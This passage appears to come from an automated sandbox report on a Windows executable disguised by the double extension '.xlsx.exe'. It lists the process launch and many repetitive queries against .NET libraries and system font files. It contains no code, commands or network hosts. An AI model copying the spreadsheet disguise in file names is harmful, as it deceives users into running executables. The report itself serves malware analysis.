                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"Jump to behavior
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
